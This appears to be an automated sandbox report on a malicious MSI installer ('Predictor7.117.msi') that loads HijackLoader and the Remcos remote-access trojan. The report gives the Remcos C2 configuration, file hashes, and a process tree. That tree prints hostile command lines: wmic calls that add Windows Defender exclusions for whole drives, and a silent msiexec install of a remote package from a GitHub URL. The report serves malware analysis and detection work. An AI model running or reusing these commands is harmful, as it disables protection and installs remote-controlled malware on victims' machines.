Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
30-01-2025 19:55
Static task
static1
Behavioral task
behavioral1
Sample
Predictor7.117.msi
Resource
win10v2004-20250129-en
Behavioral task
behavioral2
Sample
Predictor7.117.msi
Resource
win7-20240903-en
General
-
Target
Predictor7.117.msi
-
Size
2.9MB
-
MD5
5bac811249b2f91a6d769cd4af4154e2
-
SHA1
911195edb41cd320d5538fa5560f0bd18eb6c11f
-
SHA256
289266f50512ab914e578d5ce34352d297983fe303edd7b211521e94e4db7ca7
-
SHA512
e38653ed324d2f764c06685a791ebf28f2ba9864d960fab104c91c86f831a7037f2a627e9048b49b5b9258a31165c3a9147be15b822ae50e0d8d9c8d2dd73cda
-
SSDEEP
49152:kwfjkMo27Epq0n8Toc4Ug8r6F5mCmR+w+TzMShkkcr4u12X8ecau3aLSQlq8HoBu:lYn8ToBo6bqrnbecauKLO8IG/d
Malware Config
Extracted
remcos
v2
185.157.162.126:1995
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
qsdazeazd-EL00KX
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detects HijackLoader (aka IDAT Loader) 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023cc8-92.dat family_hijackloader -
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
-
Hijackloader family
-
Remcos family
-
Use of msiexec (install) with remote resource 1 IoCs
pid Process 1648 msiexec.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 17 2836 msiexec.exe 20 2836 msiexec.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 raw.githubusercontent.com 20 raw.githubusercontent.com -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation cscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\Control Panel\International\Geo\Nation wscript.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4292 set thread context of 3600 4292 EHttpSrv.exe 113 PID 3600 set thread context of 4788 3600 cmd.exe 120 -
Drops file in Program Files directory 15 IoCs
description ioc Process File created C:\Program Files (x86)\sev\dev\updt\lola.bat msiexec.exe File created C:\Program Files (x86)\sev\dev\updt\secondaryTask.vbs msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\mfc80u.dll msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\Microsoft.VC80.CRT.manifest msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\msvcr80.dll msiexec.exe File created C:\Program Files (x86)\sev\dev\Firefox Installer.exe msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\audiogram.tif msiexec.exe File created C:\Program Files (x86)\sev\dev\ScreenRec_webinstall_all.exe msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\Microsoft.VC80.MFCLOC.manifest msiexec.exe File created C:\Program Files (x86)\sev\dev\updt\runTaskAsAdmin.vbs msiexec.exe File created C:\Program Files (x86)\sev\dev\updt\task.vbs msiexec.exe File created C:\Program Files (x86)\sev\dev\updt\putty.exe msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\http_dll.dll msiexec.exe File created C:\Program Files (x86)\Common Files\PackagerUpdt\Microsoft.VC80.MFC.manifest msiexec.exe -
Drops file in Windows directory 20 IoCs
description ioc Process File created C:\Windows\Installer\SourceHash{156F8D10-EDAF-491B-BFEA-1DA3B9548D50} msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIEC18.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIED43.tmp msiexec.exe File opened for modification C:\Windows\Installer\e578f20.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI90C7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEB2C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEBBA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEC58.tmp msiexec.exe File created C:\Windows\Installer\e578f20.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI9126.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9166.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI9222.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8F7E.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIA49C.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe -
Executes dropped EXE 1 IoCs
pid Process 4292 EHttpSrv.exe -
Loads dropped DLL 11 IoCs
pid Process 1708 MsiExec.exe 1708 MsiExec.exe 1708 MsiExec.exe 1708 MsiExec.exe 4408 MsiExec.exe 4408 MsiExec.exe 4408 MsiExec.exe 4408 MsiExec.exe 4292 EHttpSrv.exe 4292 EHttpSrv.exe 4788 EHttpSrv.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 4176 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EHttpSrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EHttpSrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Kills process with taskkill 2 IoCs
pid Process 1520 taskkill.exe 4608 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 3924 msiexec.exe 3924 msiexec.exe 2836 msiexec.exe 2836 msiexec.exe 4292 EHttpSrv.exe 3600 cmd.exe 3600 cmd.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4292 EHttpSrv.exe 3600 cmd.exe 3600 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4176 msiexec.exe Token: SeIncreaseQuotaPrivilege 4176 msiexec.exe Token: SeSecurityPrivilege 3924 msiexec.exe Token: SeCreateTokenPrivilege 4176 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4176 msiexec.exe Token: SeLockMemoryPrivilege 4176 msiexec.exe Token: SeIncreaseQuotaPrivilege 4176 msiexec.exe Token: SeMachineAccountPrivilege 4176 msiexec.exe Token: SeTcbPrivilege 4176 msiexec.exe Token: SeSecurityPrivilege 4176 msiexec.exe Token: SeTakeOwnershipPrivilege 4176 msiexec.exe Token: SeLoadDriverPrivilege 4176 msiexec.exe Token: SeSystemProfilePrivilege 4176 msiexec.exe Token: SeSystemtimePrivilege 4176 msiexec.exe Token: SeProfSingleProcessPrivilege 4176 msiexec.exe Token: SeIncBasePriorityPrivilege 4176 msiexec.exe Token: SeCreatePagefilePrivilege 4176 msiexec.exe Token: SeCreatePermanentPrivilege 4176 msiexec.exe Token: SeBackupPrivilege 4176 msiexec.exe Token: SeRestorePrivilege 4176 msiexec.exe Token: SeShutdownPrivilege 4176 msiexec.exe Token: SeDebugPrivilege 4176 msiexec.exe Token: SeAuditPrivilege 4176 msiexec.exe Token: SeSystemEnvironmentPrivilege 4176 msiexec.exe Token: SeChangeNotifyPrivilege 4176 msiexec.exe Token: SeRemoteShutdownPrivilege 4176 msiexec.exe Token: SeUndockPrivilege 4176 msiexec.exe Token: SeSyncAgentPrivilege 4176 msiexec.exe Token: SeEnableDelegationPrivilege 4176 msiexec.exe Token: SeManageVolumePrivilege 4176 msiexec.exe Token: SeImpersonatePrivilege 4176 msiexec.exe Token: SeCreateGlobalPrivilege 4176 msiexec.exe Token: SeRestorePrivilege 3924 msiexec.exe Token: SeTakeOwnershipPrivilege 3924 msiexec.exe Token: SeRestorePrivilege 3924 msiexec.exe Token: SeTakeOwnershipPrivilege 3924 msiexec.exe Token: SeRestorePrivilege 3924 msiexec.exe Token: SeTakeOwnershipPrivilege 3924 msiexec.exe Token: SeRestorePrivilege 3924 msiexec.exe Token: SeTakeOwnershipPrivilege 3924 msiexec.exe Token: SeRestorePrivilege 3924 msiexec.exe Token: SeTakeOwnershipPrivilege 3924 msiexec.exe Token: SeRestorePrivilege 3924 msiexec.exe Token: SeTakeOwnershipPrivilege 3924 msiexec.exe Token: SeRestorePrivilege 3924 msiexec.exe Token: SeTakeOwnershipPrivilege 3924 msiexec.exe Token: SeRestorePrivilege 3924 msiexec.exe Token: SeTakeOwnershipPrivilege 3924 msiexec.exe Token: SeIncreaseQuotaPrivilege 2412 WMIC.exe Token: SeSecurityPrivilege 2412 WMIC.exe Token: SeTakeOwnershipPrivilege 2412 WMIC.exe Token: SeLoadDriverPrivilege 2412 WMIC.exe Token: SeSystemProfilePrivilege 2412 WMIC.exe Token: SeSystemtimePrivilege 2412 WMIC.exe Token: SeProfSingleProcessPrivilege 2412 WMIC.exe Token: SeIncBasePriorityPrivilege 2412 WMIC.exe Token: SeCreatePagefilePrivilege 2412 WMIC.exe Token: SeBackupPrivilege 2412 WMIC.exe Token: SeRestorePrivilege 2412 WMIC.exe Token: SeShutdownPrivilege 2412 WMIC.exe Token: SeDebugPrivilege 2412 WMIC.exe Token: SeSystemEnvironmentPrivilege 2412 WMIC.exe Token: SeRemoteShutdownPrivilege 2412 WMIC.exe Token: SeUndockPrivilege 2412 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4176 msiexec.exe 4176 msiexec.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 3924 wrote to memory of 1708 3924 msiexec.exe 88 PID 3924 wrote to memory of 1708 3924 msiexec.exe 88 PID 3924 wrote to memory of 1708 3924 msiexec.exe 88 PID 3924 wrote to memory of 3088 3924 msiexec.exe 89 PID 3924 wrote to memory of 3088 3924 msiexec.exe 89 PID 3088 wrote to memory of 3416 3088 cmd.exe 91 PID 3088 wrote to memory of 3416 3088 cmd.exe 91 PID 3088 wrote to memory of 4440 3088 cmd.exe 92 PID 3088 wrote to memory of 4440 3088 cmd.exe 92 PID 4440 wrote to memory of 3492 4440 cscript.exe 93 PID 4440 wrote to memory of 3492 4440 cscript.exe 93 PID 3492 wrote to memory of 712 3492 wscript.exe 94 PID 3492 wrote to memory of 712 3492 wscript.exe 94 PID 712 wrote to memory of 2412 712 cmd.exe 96 PID 712 wrote to memory of 2412 712 cmd.exe 96 PID 3492 wrote to memory of 2552 3492 wscript.exe 98 PID 3492 wrote to memory of 2552 3492 wscript.exe 98 PID 2552 wrote to memory of 2812 2552 cmd.exe 100 PID 2552 wrote to memory of 2812 2552 cmd.exe 100 PID 3492 wrote to memory of 2524 3492 wscript.exe 101 PID 3492 wrote to memory of 2524 3492 wscript.exe 101 PID 2524 wrote to memory of 1520 2524 cmd.exe 103 PID 2524 wrote to memory of 1520 2524 cmd.exe 103 PID 3492 wrote to memory of 904 3492 wscript.exe 105 PID 3492 wrote to memory of 904 3492 wscript.exe 105 PID 904 wrote to memory of 4608 904 cmd.exe 107 PID 904 wrote to memory of 4608 904 cmd.exe 107 PID 3492 wrote to memory of 2672 3492 wscript.exe 108 PID 3492 wrote to memory of 2672 3492 wscript.exe 108 PID 2672 wrote to memory of 1648 2672 wscript.exe 109 PID 2672 wrote to memory of 1648 2672 wscript.exe 109 PID 2836 wrote to memory of 4408 2836 msiexec.exe 111 PID 2836 wrote to memory of 4408 2836 msiexec.exe 111 PID 2836 wrote to memory of 4408 2836 msiexec.exe 111 PID 2836 wrote to memory of 4292 2836 msiexec.exe 112 PID 2836 wrote to memory of 4292 2836 msiexec.exe 112 PID 2836 wrote to memory of 4292 2836 msiexec.exe 112 PID 4292 wrote to memory of 3600 4292 EHttpSrv.exe 113 PID 4292 wrote to memory of 3600 4292 EHttpSrv.exe 113 PID 4292 wrote to memory of 3600 4292 EHttpSrv.exe 113 PID 4292 wrote to memory of 3600 4292 EHttpSrv.exe 113 PID 3600 wrote to memory of 4788 3600 cmd.exe 120 PID 3600 wrote to memory of 4788 3600 cmd.exe 120 PID 3600 wrote to memory of 4788 3600 cmd.exe 120 PID 3600 wrote to memory of 4788 3600 cmd.exe 120 PID 3600 wrote to memory of 4788 3600 cmd.exe 120
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Predictor7.117.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4176
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5A2EB9BD1D14846A2663BD63E73588E82⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1708
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\sev\dev\updt\lola.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:3416
-
-
C:\Windows\system32\cscript.execscript //nologo "C:\Program Files (x86)\sev\dev\updt\runTaskAsAdmin.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Program Files (x86)\sev\dev\updt\task.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"5⤵
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Windows\System32\Wbem\WMIC.exewmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"5⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\System32\Wbem\WMIC.exewmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"6⤵PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im cmd.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\taskkill.exetaskkill /f /im cmd.exe6⤵
- Kills process with taskkill
PID:1520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im msiexec.exe5⤵
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\system32\taskkill.exetaskkill /f /im msiexec.exe6⤵
- Kills process with taskkill
PID:4608
-
-
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Program Files (x86)\sev\dev\updt\secondaryTask.vbs" //B5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.msi" /qn6⤵
- Use of msiexec (install) with remote resource
- Enumerates connected drives
PID:1648
-
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A93A8B46A02D7F5A003AAC2B3692F0FD2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4408
-
-
C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"2⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"C:\Program Files (x86)\Common Files\PackagerUpdt\EHttpSrv.exe"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4788
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5450698686d5bdab99285264845d1fecd
SHA15c2c0c2381a020124fe1854837c1c5075bb406b9
SHA256ced658722eb4e35212cd2858b1d610dde9196236a7efcfed5ecefcae36f6d850
SHA512137ede95a0d29ac9c7a2725fa694290d43e1f43a3819b1198ca44acdb716e6b6f504b5032623c036ba0c6972d9b543f0036e5755f23ba39e5816d2bb319766cf
-
Filesize
2KB
MD50ff5b9eac0879788beae790a01b0d1e4
SHA1f9552a77936626dda17d01ecea6946934bb8f53b
SHA2564bfc4494b70c1a1ccb7ed26c8a3b4002542d92e9868a56a9423952a7e69472cf
SHA512cb1c5a999ba64f10f8dc457448ffc09d5686c2bc44b66909342eee279e7e437358705c9d39f13d23f9f3f8ad27be72b585ed573731dc9321329c498f343a70ec
-
Filesize
20KB
MD59329ba45c8b97485926a171e34c2abb8
SHA120118bc0432b4e8b3660a4b038b20ca28f721e5c
SHA256effa6fcb8759375b4089ccf61202a5c63243f4102872e64e3eb0a1bdc2727659
SHA5120af06b5495142ba0632a46be0778a7bd3d507e9848b3159436aa504536919abbcacd8b740ef4b591296e86604b49e0642fee2c273a45e44b41a80f91a1d52acc
-
Filesize
1.0MB
MD5686b224b4987c22b153fbb545fee9657
SHA1684ee9f018fbb0bbf6ffa590f3782ba49d5d096c
SHA256a2ac851f35066c2f13a7452b7a9a3fee05bfb42907ae77a6b85b212a2227fc36
SHA51244d65db91ceea351d2b6217eaa27358dbc2ed27c9a83d226b59aecb336a9252b60aec5ce5e646706a2af5631d5ee0f721231ec751e97e47bbbc32d5f40908875
-
Filesize
877KB
MD55124236fd955464317fbb1f344a1d2f2
SHA1fe3a91e252f1dc3c3b4980ade7157369ea6f5097
SHA256ed1389002cdf96c9b54de35b6e972166ee3296d628943fd594a383e674c5cba6
SHA5122b2ac23244b16f936ef9a4049586f58c809fcc4391a56390cc5db2e8d96140001e0b977680ed1d8b0ab9c410e865a880209e22add8d42e563dc40bc91236b252
-
Filesize
2.3MB
MD51e2a640f1a98da16fc61c865cec7d54e
SHA1178563fab7b06e99551f66ba090d0911205a2fe4
SHA256e296a18272a7bde471f37e51d49e6febe944ed4e78a2d5e79f1b2ee3330fb10f
SHA5122426b1ce2bd01af6f34c56e1ef0290e521566ae1196a15aeb594bcf33793aa405ce01b4196bfe48de33320bab7a570a55110995025c54edcf790c2d10166fa9c
-
Filesize
656B
MD573e4aed899a6014299b63ccf9eb520f5
SHA14147c2dd9277d64c5ecc9e7782e5d5aa94e56b00
SHA25601c8cc249b04fee266cf757130dfef5b099cdf03337161a6c7f9346b7d2cb4f0
SHA512e0ad8e8800908a5e0b60d433997c0cebc0750ae7bee0e7fe51c2e5f7fd61792f0c600c2fe65965b0c2562c61f05773d9106d89d7b2d1fb71eaed0dfbe19b5612
-
Filesize
872B
MD564dccadec94cfd25ee1ed659b29182b2
SHA164bc8bca314a238a900de2092587b07903b08e6c
SHA256c8c9c931af038f86f25acb8f2e5dd98b01c7fdd41f0a1a3afa44e555f0b976cd
SHA512adff4899e842137c9d78cd1b0056f3610d442b480e2829a41ad505d7353f59dc9fe50ec6055478ace36e4069e388a279e5ec60ca98751a13a559b40d4c847f93
-
Filesize
512B
MD5bcc1d6a3c9aeec994cd31f86ada37ae6
SHA10b7bb7af96d842cfbb7a89793a4292fec4289a8c
SHA25641590f3a8ba3c910f11fd5fa095856d5bc556f20fa4fd6d269aa1be4e08b4c64
SHA5128793e62dc4a9465ef5254e15b3471573a242705dfdf74bd3d09d97c10dd84daf69aa8c0b5c9bc3c5a7302e431fc2ed417b1e6c194da106765e50ad385ea955b7
-
Filesize
2KB
MD5be8e86dd465192f94e52b2cf7bb6243a
SHA1e62cfcee783511bf7aa2411564b856967a185749
SHA25699d59c98978a5f883d3c69c9c6352311e07cb4b9ff0cd6ee96cd9fa6057b5a53
SHA512fd1ab9e90af36cbed8b46115288a8868500bfde0cbe9b72a9b1b9801cebc2acb0829d9cadf97e7cd70b6322afd65df2965a51a11672458251ff63cd535b17cb2
-
Filesize
1.0MB
MD5b1c54579b4a266f696ed834218fb4ce9
SHA1069f13361e0931267132fa7f40cd77c479fb2d1b
SHA2561b1e0db1f66b6e01256edad2a779ff8652b4831cd97ec9b07281aecef574c75e
SHA512b360a473468d98e68bdad4c1e229f67d01faf562be622298d5b5410d710e8dc59c4a3543830cc6087600ea0de498584816c4bd4ae314a7f8552b2203f8756635
-
Filesize
21KB
MD5cb416aec2ceb27b31f5fafd5ceaea762
SHA1325026bf366f0d594601501d0a459473e110ffd1
SHA25649910f1b9d831a2db540b88af3f8162d691450182fd79f7ed55812ed7e893447
SHA512ea37a69640e4f3a2f323e30e02b9b7918f504816b9bb729c4cfda459773e14c4e5bcd93816722ef811631193702f714109d593f3bc74dd6e9eb03a1f0f5008f3
-
Filesize
557KB
MD52c9c51ac508570303c6d46c0571ea3a1
SHA1e3e0fe08fa11a43c8bca533f212bdf0704c726d5
SHA256ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550
SHA512df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127
-
Filesize
4.3MB
MD58e31046891c36ca794fb01262cd890d9
SHA17f812da89f328e871290be32bdead1fc869377d6
SHA256d03d7ea5956a5d9ca6c1b1af800350b6ef400815b452f69a886f4156ba1a3ec5
SHA51295c4c8f0196a8e373913fc41eb44c70fa8abbea38324993aa42ca05be5d6229430a4e2a4671a914a4f00986b75845c247a91809aae994ff835aa56614606840d
-
Filesize
156KB
MD5deab71298fb744fab5d6dbbe17f34341
SHA1eae7c53945736d28148e6667edff143ab3f7ca78
SHA2566b60c13ef2d1132cd9be3574f00faaf3601401aa245bb2571b3ff100800866f4
SHA512c70467a92a52998dc5943c2e2a639501cbd200f8ca7b15f84bb3159aa338b6f9d3cb92a2ea8f1076e6e068c5e2a096f807bf358df891ab3bc895a27e291793ea